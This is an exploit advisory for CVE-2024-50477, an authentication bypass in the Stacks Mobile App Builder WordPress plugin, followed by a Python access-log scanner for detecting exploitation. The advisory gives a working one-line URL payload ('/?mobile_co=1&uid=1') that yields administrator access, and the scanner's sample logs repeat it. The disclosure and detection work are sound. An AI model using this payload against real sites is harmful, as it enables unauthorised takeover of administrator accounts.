Stacks Mobile App Builder 5.2.3 – Authentication Bypass via Account Takeover


# Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover
# Date: October 25, 2024
# Exploit Author: stealthcopter
# Vendor Homepage: https://stacksmarket.co/
# Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/
# Version: <= 5.2.3
# Tested on: Ubuntu 24.10/Docker
# CVE: CVE-2024-50477
# References:
# - https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
# - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover


1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`:
`/?mobile_co=1&uid=1`
2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator).
3. Visit `/wp-admin` — you should have full access to the admin dashboard.
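
For defenders reviewing a site that ran an affected version, the following added example (not part of the original advisory) scans web server access logs for requests that carry both `mobile_co` and `uid`, and marks clients that afterwards received a 200 from `/wp-admin`. The combined log format, the function name `find_takeover_requests`, and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Oct/2024:10:01:02 +0000] "GET /?mobile_co=1&uid=1 HTTP/1.1" 200 5120 "-" "curl/8.5.0"
203.0.113.7 - - [25/Oct/2024:10:01:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 48211 "-" "curl/8.5.0"
198.51.100.4 - - [25/Oct/2024:10:02:00 +0000] "GET /?uid=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Oct/2024:10:03:00 +0000] "GET /?mobile_co=1&uid=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [25/Oct/2024:10:04:00 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Captures: client IP, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_takeover_requests(log_text):
    """Return one record per request carrying both mobile_co and uid."""
    hits, by_ip = [], {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        # parse_qs percent-decodes parameter names and values
        params = parse_qs(url.query, keep_blank_values=True)
        if "mobile_co" in params and "uid" in params:
            hit = {"ip": ip, "time": ts, "method": method,
                   "uid": params["uid"][0], "status": int(status),
                   "admin_followup": False}
            hits.append(hit)
            by_ip[ip] = hit
        elif ip in by_ip and url.path.startswith("/wp-admin") and status == "200":
            # Same client later got a 200 from the dashboard: higher priority.
            by_ip[ip]["admin_followup"] = True
    return hits

if __name__ == "__main__":
    for h in find_takeover_requests(SAMPLE_LOG):
        print(h)
```

Correlation by client IP is a heuristic, so treat each hit as a lead to check against WordPress session and user-change records for the logged `uid`.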
            


